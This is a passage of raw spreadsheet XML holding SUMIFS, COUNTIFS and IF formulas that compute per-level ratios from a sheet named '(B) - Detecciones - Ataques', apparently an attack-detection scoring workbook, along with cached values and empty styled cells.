        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ51)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ51 &amp; "*"))</f>
        <v>0.4</v>
      </c>
      <c r="FB51" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ51)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ51 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ51)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ51 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FC51" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ51,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ51 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ51,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ51 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="FD51" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ51,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ51 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ51,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ51 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
      <c r="FE51" s="621"/>
      <c r="FF51" s="621"/>
      <c r="FG51" s="621"/>
      <c r="FH51" s="621"/>
      <c r="FI51" s="621"/>
      <c r="FJ51" s="621"/>
      <c r="FK51" s="621"/>
      <c r="FL51" s="621"/>
      <c r="FM51" s="621"/>
      <c r="FN51" s="621"/>
      <c r="FO51" s="621"/>
      <c r="FP51" s="621"/>
      <c r="FQ51" s="621"/>
      <c r="FR51" s="621"/>
      <c r="FS51" s="621"/>
      <c r="FT51" s="621"/>
      <c r="FU51" s="621"/>
    </row>
    <row r="52">
      <c r="EL52" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP43&lt;&gt;0,'(B) - Detecciones - Ataques'!IP43*'(B) - Detecciones - Ataques'!IL43/('(B) - Detecciones - Ataques'!IL43+'(B) - Detecciones - Ataques'!IN43),0)</f>
        <v>0</v>
      </c>
      <c r="EM52" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP43&lt;&gt;0,'(B) - Detecciones - Ataques'!IP43*'(B) - Detecciones - Ataques'!IN43/('(B) - Detecciones - Ataques'!IL43+'(B) - Detecciones - Ataques'!IN43),0)</f>
        <v>0</v>
      </c>
      <c r="EN52" s="626"/>
      <c r="EO52" s="626"/>
      <c r="EP52" s="744"/>
      <c r="EQ52" s="745"/>
      <c r="ER52" s="745"/>
      <c r="ES52" s="745"/>
      <c r="ET52" s="745"/>
      <c r="EU52" s="745"/>
      <c r="EV52" s="745"/>
      <c r="EW52" s="745"/>
      <c r="EX52" s="745"/>
      <c r="EY52" s="745"/>
      <c r="EZ52" s="422" t="s">
        <v>558</v>
      </c>
      <c r="FA52" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ52)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ52 &amp; "*"))</f>
        <v>0.7727272727</v>
      </c>
      <c r="FB52" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ52)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ52 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FC52" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ52,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ52 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ52,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ52 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>1</v>
      </c>
      <c r="FD52" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ52,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ52 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ52,'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ52 &amp; "*",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>1</v>
      </c>
      <c r="FE52" s="621"/>
      <c r="FF52" s="621"/>
      <c r="FG52" s="621"/>
      <c r="FH52" s="621"/>
      <c r="FI52" s="621"/>
      <c r="FJ52" s="621"/>
      <c r="FK52" s="621"/>
      <c r="FL52" s="621"/>
      <c r="FM52" s="621"/>
      <c r="FN52" s="621"/>
      <c r="FO52" s="621"/>
      <c r="FP52" s="621"/>
      <c r="FQ52" s="621"/>
      <c r="FR52" s="621"/>
      <c r="FS52" s="621"/>
      <c r="FT52" s="621"/>
      <c r="FU52" s="621"/>
    </row>
    <row r="53">
      <c r="EL53" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP44&lt;&gt;0,'(B) - Detecciones - Ataques'!IP44*'(B) - Detecciones - Ataques'!IL44/('(B) - Detecciones - Ataques'!IL44+'(B) - Detecciones - Ataques'!IN44),0)</f>
        <v>1</v>
      </c>
      <c r="EM53" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP44&lt;&gt;0,'(B) - Detecciones - Ataques'!IP44*'(B) - Detecciones - Ataques'!IN44/('(B) - Detecciones - Ataques'!IL44+'(B) - Detecciones - Ataques'!IN44),0)</f>
        <v>0</v>
      </c>
      <c r="EN53" s="626"/>
      <c r="EO53" s="626"/>
      <c r="EP53" s="744"/>
      <c r="EQ53" s="745"/>
      <c r="ER53" s="745"/>
      <c r="ES53" s="745"/>
      <c r="ET53" s="745"/>
      <c r="EU53" s="745"/>
      <c r="EV53" s="745"/>
      <c r="EW53" s="745"/>
      <c r="EX53" s="745"/>
      <c r="EY53" s="745"/>
      <c r="EZ53" s="745"/>
      <c r="FA53" s="745"/>
      <c r="FB53" s="745"/>
      <c r="FC53" s="745"/>
      <c r="FD53" s="745"/>
      <c r="FE53" s="745"/>
      <c r="FF53" s="745"/>
      <c r="FG53" s="745"/>
      <c r="FH53" s="745"/>
      <c r="FI53" s="745"/>
      <c r="FJ53" s="745"/>
      <c r="FK53" s="745"/>
      <c r="FL53" s="745"/>
      <c r="FM53" s="745"/>
      <c r="FN53" s="745"/>
      <c r="FO53" s="745"/>
      <c r="FP53" s="745"/>
      <c r="FQ53" s="745"/>
      <c r="FR53" s="745"/>
      <c r="FS53" s="745"/>
      <c r="FT53" s="745"/>
      <c r="FU53" s="745"/>
    </row>
    <row r="54">
      <c r="DM54" s="42" t="s">
        <v>2719</v>
      </c>
      <c r="DN54" s="42" t="s">
        <v>2720</v>
      </c>
      <c r="EL54" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP45&lt;&gt;0,'(B) - Detecciones - Ataques'!IP45*'(B) - Detecciones - Ataques'!IL45/('(B) - Detecciones - Ataques'!IL45+'(B) - Detecciones - Ataques'!IN45),0)</f>
        <v>0</v>
      </c>
      <c r="EM54" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP45&lt;&gt;0,'(B) - Detecciones - Ataques'!IP45*'(B) - Detecciones - Ataques'!IN45/('(B) - Detecciones - Ataques'!IL45+'(B) - Detecciones - Ataques'!IN45),0)</f>
        <v>0</v>
      </c>
      <c r="EN54" s="626"/>
      <c r="EO54" s="626"/>
      <c r="EP54" s="744"/>
      <c r="EQ54" s="745"/>
      <c r="ER54" s="745"/>
      <c r="ES54" s="745"/>
      <c r="ET54" s="745"/>
      <c r="EU54" s="745"/>
      <c r="EV54" s="745"/>
      <c r="EW54" s="745"/>
      <c r="EX54" s="745"/>
      <c r="EY54" s="745"/>
      <c r="EZ54" s="745"/>
      <c r="FA54" s="745"/>
      <c r="FB54" s="745"/>
      <c r="FC54" s="745"/>
      <c r="FD54" s="745"/>
      <c r="FE54" s="745"/>
      <c r="FF54" s="745"/>
      <c r="FG54" s="745"/>
      <c r="FH54" s="745"/>
      <c r="FI54" s="745"/>
      <c r="FJ54" s="745"/>
      <c r="FK54" s="745"/>
      <c r="FL54" s="745"/>
      <c r="FM54" s="745"/>
      <c r="FN54" s="745"/>
      <c r="FO54" s="745"/>
      <c r="FP54" s="745"/>
      <c r="FQ54" s="745"/>
      <c r="FR54" s="745"/>
      <c r="FS54" s="745"/>
      <c r="FT54" s="745"/>
      <c r="FU54" s="745"/>
    </row>
    <row r="55">
      <c r="DM55" s="338">
        <v>0.27459016393442626</v>
      </c>
      <c r="DN55" s="338">
        <v>0.0</v>
      </c>
      <c r="EL55" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP46&lt;&gt;0,'(B) - Detecciones - Ataques'!IP46*'(B) - Detecciones - Ataques'!IL46/('(B) - Detecciones - Ataques'!IL46+'(B) - Detecciones - Ataques'!IN46),0)</f>
        <v>0</v>
      </c>
      <c r="EM55" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP46&lt;&gt;0,'(B) - Detecciones - Ataques'!IP46*'(B) - Detecciones - Ataques'!IN46/('(B) - Detecciones - Ataques'!IL46+'(B) - Detecciones - Ataques'!IN46),0)</f>
        <v>1</v>
      </c>
      <c r="EN55" s="626"/>
      <c r="EO55" s="626"/>
      <c r="EP55" s="744"/>
      <c r="EQ55" s="745"/>
      <c r="ER55" s="745"/>
      <c r="ES55" s="745"/>
      <c r="ET55" s="745"/>
      <c r="EU55" s="745"/>
      <c r="EV55" s="745"/>
      <c r="EW55" s="745"/>
      <c r="EX55" s="745"/>
      <c r="EY55" s="745"/>
      <c r="EZ55" s="745"/>
      <c r="FA55" s="745"/>
      <c r="FB55" s="745"/>
      <c r="FC55" s="745"/>
      <c r="FD55" s="745"/>
      <c r="FE55" s="745"/>
      <c r="FF55" s="745"/>
      <c r="FG55" s="745"/>
      <c r="FH55" s="745"/>
      <c r="FI55" s="745"/>
      <c r="FJ55" s="745"/>
      <c r="FK55" s="745"/>
      <c r="FL55" s="745"/>
      <c r="FM55" s="745"/>
      <c r="FN55" s="745"/>
      <c r="FO55" s="745"/>
      <c r="FP55" s="745"/>
      <c r="FQ55" s="745"/>
      <c r="FR55" s="745"/>
      <c r="FS55" s="745"/>
      <c r="FT55" s="745"/>
      <c r="FU55" s="745"/>
    </row>
    <row r="56">
      <c r="EL56" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP47&lt;&gt;0,'(B) - Detecciones - Ataques'!IP47*'(B) - Detecciones - Ataques'!IL47/('(B) - Detecciones - Ataques'!IL47+'(B) - Detecciones - Ataques'!IN47),0)</f>
        <v>1</v>
      </c>
      <c r="EM56" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP47&lt;&gt;0,'(B) - Detecciones - Ataques'!IP47*'(B) - Detecciones - Ataques'!IN47/('(B) - Detecciones - Ataques'!IL47+'(B) - Detecciones - Ataques'!IN47),0)</f>
        <v>0</v>
      </c>
      <c r="EN56" s="626"/>
      <c r="EO56" s="626"/>
      <c r="EP56" s="744"/>
      <c r="EQ56" s="745"/>
      <c r="ER56" s="745"/>
      <c r="ES56" s="745"/>
      <c r="ET56" s="745"/>
      <c r="EU56" s="745"/>
      <c r="EV56" s="745"/>
      <c r="EW56" s="745"/>
      <c r="EX56" s="745"/>
      <c r="EY56" s="745"/>
      <c r="EZ56" s="745"/>
      <c r="FA56" s="745"/>
      <c r="FB56" s="745"/>
      <c r="FC56" s="745"/>
      <c r="FD56" s="745"/>
      <c r="FE56" s="745"/>
      <c r="FF56" s="745"/>
      <c r="FG56" s="745"/>
      <c r="FH56" s="745"/>
      <c r="FI56" s="745"/>
      <c r="FJ56" s="745"/>
      <c r="FK56" s="745"/>
      <c r="FL56" s="745"/>
      <c r="FM56" s="745"/>
      <c r="FN56" s="745"/>
      <c r="FO56" s="745"/>
      <c r="FP56" s="745"/>
      <c r="FQ56" s="745"/>
      <c r="FR56" s="745"/>
      <c r="FS56" s="745"/>
      <c r="FT56" s="745"/>
      <c r="FU56" s="745"/>
    </row>
    <row r="57">
      <c r="EL57" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP48&lt;&gt;0,'(B) - Detecciones - Ataques'!IP48*'(B) - Detecciones - Ataques'!IL48/('(B) - Detecciones - Ataques'!IL48+'(B) - Detecciones - Ataques'!IN48),0)</f>
        <v>1</v>
      </c>
      <c r="EM57" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP48&lt;&gt;0,'(B) - Detecciones - Ataques'!IP48*'(B) - Detecciones - Ataques'!IN48/('(B) - Detecciones - Ataques'!IL48+'(B) - Detecciones - Ataques'!IN48),0)</f>
        <v>0</v>
      </c>
      <c r="EN57" s="626"/>
      <c r="EO57" s="626"/>
      <c r="EP57" s="744"/>
      <c r="EQ57" s="745"/>
      <c r="ER57" s="745"/>
      <c r="ES57" s="745"/>
      <c r="ET57" s="745"/>
      <c r="EU57" s="745"/>
      <c r="EV57" s="745"/>
      <c r="EW57" s="745"/>
      <c r="EX57" s="745"/>
      <c r="EY57" s="745"/>
      <c r="EZ57" s="745"/>
      <c r="FA57" s="745"/>
      <c r="FB57" s="745"/>
      <c r="FC57" s="745"/>
      <c r="FD57" s="745"/>
      <c r="FE57" s="745"/>
      <c r="FF57" s="745"/>
      <c r="FG57" s="745"/>
      <c r="FH57" s="745"/>
      <c r="FI57" s="745"/>
      <c r="FJ57" s="745"/>
      <c r="FK57" s="745"/>
      <c r="FL57" s="745"/>
      <c r="FM57" s="745"/>
      <c r="FN57" s="745"/>
      <c r="FO57" s="745"/>
      <c r="FP57" s="745"/>
      <c r="FQ57" s="745"/>
      <c r="FR57" s="745"/>
      <c r="FS57" s="745"/>
      <c r="FT57" s="745"/>
      <c r="FU57" s="745"/>
    </row>
    <row r="58">
      <c r="EL58" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP49&lt;&gt;0,'(B) - Detecciones - Ataques'!IP49*'(B) - Detecciones - Ataques'!IL49/('(B) - Detecciones - Ataques'!IL49+'(B) - Detecciones - Ataques'!IN49),0)</f>
        <v>1</v>
      </c>
      <c r="EM58" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP49&lt;&gt;0,'(B) - Detecciones - Ataques'!IP49*'(B) - Detecciones - Ataques'!IN49/('(B) - Detecciones - Ataques'!IL49+'(B) - Detecciones - Ataques'!IN49),0)</f>
        <v>0</v>
      </c>
      <c r="EN58" s="626"/>
      <c r="EO58" s="626"/>
      <c r="EP58" s="744"/>
      <c r="EQ58" s="745"/>
      <c r="ER58" s="745"/>
      <c r="ES58" s="745"/>
      <c r="ET58" s="745"/>
      <c r="EU58" s="745"/>
      <c r="EV58" s="745"/>
      <c r="EW58" s="745"/>
      <c r="EX58" s="745"/>
      <c r="EY58" s="745"/>
      <c r="EZ58" s="745"/>
      <c r="FA58" s="745"/>
      <c r="FB58" s="745"/>
      <c r="FC58" s="745"/>
      <c r="FD58" s="745"/>
      <c r="FE58" s="745"/>
      <c r="FF58" s="745"/>
      <c r="FG58" s="745"/>
      <c r="FH58" s="745"/>
      <c r="FI58" s="745"/>
      <c r="FJ58" s="745"/>
      <c r="FK58" s="745"/>
      <c r="FL58" s="745"/>
      <c r="FM58" s="745"/>
      <c r="FN58" s="745"/>
      <c r="FO58" s="745"/>
      <c r="FP58" s="745"/>
      <c r="FQ58" s="745"/>
      <c r="FR58" s="745"/>
      <c r="FS58" s="745"/>
      <c r="FT58" s="745"/>
      <c r="FU58" s="745"/>
    </row>
    <row r="59">
      <c r="EL59" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP50&lt;&gt;0,'(B) - Detecciones - Ataques'!IP50*'(B) - Detecciones - Ataques'!IL50/('(B) - Detecciones - Ataques'!IL50+'(B) - Detecciones - Ataques'!IN50),0)</f>
        <v>0</v>
      </c>
      <c r="EM59" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP50&lt;&gt;0,'(B) - Detecciones - Ataques'!IP50*'(B) - Detecciones - Ataques'!IN50/('(B) - Detecciones - Ataques'!IL50+'(B) - Detecciones - Ataques'!IN50),0)</f>
        <v>0</v>
      </c>
      <c r="EN59" s="626"/>
      <c r="EO59" s="626"/>
      <c r="EP59" s="744"/>
      <c r="EQ59" s="745"/>
      <c r="ER59" s="745"/>
      <c r="ES59" s="745"/>
      <c r="ET59" s="745"/>
      <c r="EU59" s="745"/>
      <c r="EV59" s="745"/>
      <c r="EW59" s="745"/>
      <c r="EX59" s="745"/>
      <c r="EY59" s="745"/>
      <c r="EZ59" s="745"/>
      <c r="FA59" s="745"/>
      <c r="FB59" s="745"/>
      <c r="FC59" s="745"/>
      <c r="FD59" s="745"/>
      <c r="FE59" s="745"/>
      <c r="FF59" s="745"/>
      <c r="FG59" s="745"/>
      <c r="FH59" s="745"/>
      <c r="FI59" s="745"/>
      <c r="FJ59" s="745"/>
      <c r="FK59" s="745"/>
      <c r="FL59" s="745"/>
      <c r="FM59" s="745"/>
      <c r="FN59" s="745"/>
      <c r="FO59" s="745"/>
      <c r="FP59" s="745"/>
      <c r="FQ59" s="745"/>
      <c r="FR59" s="745"/>
      <c r="FS59" s="745"/>
      <c r="FT59" s="745"/>
      <c r="FU59" s="745"/>
    </row>
    <row r="60">
      <c r="EL60" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP51&lt;&gt;0,'(B) - Detecciones - Ataques'!IP51*'(B) - Detecciones - Ataques'!IL51/('(B) - Detecciones - Ataques'!IL51+'(B) - Detecciones - Ataques'!IN51),0)</f>
        <v>1</v>
      </c>
      <c r="EM60" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP51&lt;&gt;0,'(B) - Detecciones - Ataques'!IP51*'(B) - Detecciones - Ataques'!IN51/('(B) - Detecciones - Ataques'!IL51+'(B) - Detecciones - Ataques'!IN51),0)</f>
        <v>0</v>
      </c>
      <c r="EN60" s="626"/>
      <c r="EO60" s="626"/>
      <c r="EP60" s="744"/>
      <c r="EQ60" s="745"/>
      <c r="ER60" s="745"/>
      <c r="ES60" s="745"/>
      <c r="ET60" s="745"/>
      <c r="EU60" s="745"/>
      <c r="EV60" s="745"/>
      <c r="EW60" s="745"/>
      <c r="EX60" s="745"/>
      <c r="EY60" s="745"/>
      <c r="EZ60" s="745"/>
      <c r="FA60" s="745"/>
      <c r="FB60" s="745"/>
      <c r="FC60" s="745"/>
      <c r="FD60" s="745"/>
      <c r="FE60" s="745"/>
      <c r="FF60" s="745"/>
      <c r="FG60" s="745"/>
      <c r="FH60" s="745"/>
      <c r="FI60" s="745"/>
      <c r="FJ60" s="745"/>
      <c r="FK60" s="745"/>
      <c r="FL60" s="745"/>
      <c r="FM60" s="745"/>
      <c r="FN60" s="745"/>
      <c r="FO60" s="745"/>
      <c r="FP60" s="745"/>
      <c r="FQ60" s="745"/>
      <c r="FR60" s="745"/>
      <c r="FS60" s="745"/>
      <c r="FT60" s="745"/>
      <c r="FU60" s="745"/>
    </row>
    <row r="61">
      <c r="EL61" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP52&lt;&gt;0,'(B) - Detecciones - Ataques'!IP52*'(B) - Detecciones - Ataques'!IL52/('(B) - Detecciones - Ataques'!IL52+'(B) - Detecciones - Ataques'!IN52),0)</f>
        <v>1</v>
      </c>
      <c r="EM61" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP52&lt;&gt;0,'(B) - Detecciones - Ataques'!IP52*'(B) - Detecciones - Ataques'!IN52/('(B) - Detecciones - Ataques'!IL52+'(B) - Detecciones - Ataques'!IN52),0)</f>
        <v>0</v>
      </c>
      <c r="EN61" s="626"/>
      <c r="EO61" s="626"/>
      <c r="EP61" s="744"/>
      <c r="EQ61" s="745"/>
      <c r="ER61" s="745"/>
      <c r="ES61" s="745"/>
      <c r="ET61" s="745"/>
      <c r="EU61" s="745"/>
      <c r="EV61" s="745"/>
      <c r="EW61" s="745"/>
      <c r="EX61" s="745"/>
      <c r="EY61" s="745"/>
      <c r="EZ61" s="745"/>
      <c r="FA61" s="745"/>
      <c r="FB61" s="745"/>
      <c r="FC61" s="745"/>
      <c r="FD61" s="745"/>
      <c r="FE61" s="745"/>
      <c r="FF61" s="745"/>
      <c r="FG61" s="745"/>
      <c r="FH61" s="745"/>
      <c r="FI61" s="745"/>
      <c r="FJ61" s="745"/>
      <c r="FK61" s="745"/>
      <c r="FL61" s="745"/>
      <c r="FM61" s="745"/>
      <c r="FN61" s="745"/>
      <c r="FO61" s="745"/>
      <c r="FP61" s="745"/>
      <c r="FQ61" s="745"/>
      <c r="FR61" s="745"/>
      <c r="FS61" s="745"/>
      <c r="FT61" s="745"/>
      <c r="FU61" s="745"/>
    </row>
    <row r="62">
      <c r="EL62" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP53&lt;&gt;0,'(B) - Detecciones - Ataques'!IP53*'(B) - Detecciones - Ataques'!IL53/('(B) - Detecciones - Ataques'!IL53+'(B) - Detecciones - Ataques'!IN53),0)</f>
        <v>0</v>
      </c>
      <c r="EM62" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP53&lt;&gt;0,'(B) - Detecciones - Ataques'!IP53*'(B) - Detecciones - Ataques'!IN53/('(B) - Detecciones - Ataques'!IL53+'(B) - Detecciones - Ataques'!IN53),0)</f>
        <v>0</v>
      </c>
      <c r="EN62" s="626"/>
      <c r="EO62" s="626"/>
      <c r="EP62" s="744"/>
      <c r="EQ62" s="745"/>
      <c r="ER62" s="745"/>
      <c r="ES62" s="745"/>
      <c r="ET62" s="745"/>
      <c r="EU62" s="745"/>
      <c r="EV62" s="745"/>
      <c r="EW62" s="745"/>
      <c r="EX62" s="745"/>
      <c r="EY62" s="745"/>
      <c r="EZ62" s="745"/>
      <c r="FA62" s="745"/>
      <c r="FB62" s="745"/>
      <c r="FC62" s="745"/>
      <c r="FD62" s="745"/>
      <c r="FE62" s="745"/>
      <c r="FF62" s="745"/>
      <c r="FG62" s="745"/>
      <c r="FH62" s="745"/>
      <c r="FI62" s="745"/>
      <c r="FJ62" s="745"/>
      <c r="FK62" s="745"/>
      <c r="FL62" s="745"/>
      <c r="FM62" s="745"/>
      <c r="FN62" s="745"/>
      <c r="FO62" s="745"/>
      <c r="FP62" s="745"/>
      <c r="FQ62" s="745"/>
      <c r="FR62" s="745"/>
      <c r="FS62" s="745"/>
      <c r="FT62" s="745"/>
      <c r="FU62" s="745"/>
    </row>
    <row r="63">
      <c r="EL63" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP54&lt;&gt;0,'(B) - Detecciones - Ataques'!IP54*'(B) - Detecciones - Ataques'!IL54/('(B) - Detecciones - Ataques'!IL54+'(B) - Detecciones - Ataques'!IN54),0)</f>
        <v>0</v>
      </c>
      <c r="EM63" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP54&lt;&gt;0,'(B) - Detecciones - Ataques'!IP54*'(B) - Detecciones - Ataques'!IN54/('(B) - Detecciones - Ataques'!IL54+'(B) - Detecciones - Ataques'!IN54),0)</f>
        <v>0</v>
      </c>
      <c r="EN63" s="626"/>
      <c r="EO63" s="626"/>
      <c r="EP63" s="744"/>
      <c r="EQ63" s="745"/>
      <c r="ER63" s="745"/>
      <c r="ES63" s="745"/>
      <c r="ET63" s="745"/>
      <c r="EU63" s="745"/>
      <c r="EV63" s="745"/>
      <c r="EW63" s="745"/>
      <c r="EX63" s="745"/>
      <c r="EY63" s="745"/>
      <c r="EZ63" s="745"/>
      <c r="FA63" s="745"/>
      <c r="FB63" s="745"/>
      <c r="FC63" s="745"/>
      <c r="FD63" s="745"/>
      <c r="FE63" s="745"/>
      <c r="FF63" s="745"/>
      <c r="FG63" s="745"/>
      <c r="FH63" s="745"/>
      <c r="FI63" s="745"/>
      <c r="FJ63" s="745"/>
      <c r="FK63" s="745"/>
      <c r="FL63" s="745"/>
      <c r="FM63" s="745"/>
      <c r="FN63" s="745"/>
      <c r="FO63" s="745"/>
      <c r="FP63" s="745"/>
      <c r="FQ63" s="745"/>
      <c r="FR63" s="745"/>
      <c r="FS63" s="745"/>
      <c r="FT63" s="745"/>
      <c r="FU63" s="745"/>
    </row>
    <row r="64">
      <c r="EL64" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP55&lt;&gt;0,'(B) - Detecciones - Ataques'!IP55*'(B) - Detecciones - Ataques'!IL55/('(B) - Detecciones - Ataques'!IL55+'(B) - Detecciones - Ataques'!IN55),0)</f>
        <v>1</v>
      </c>
      <c r="EM64" s="626">
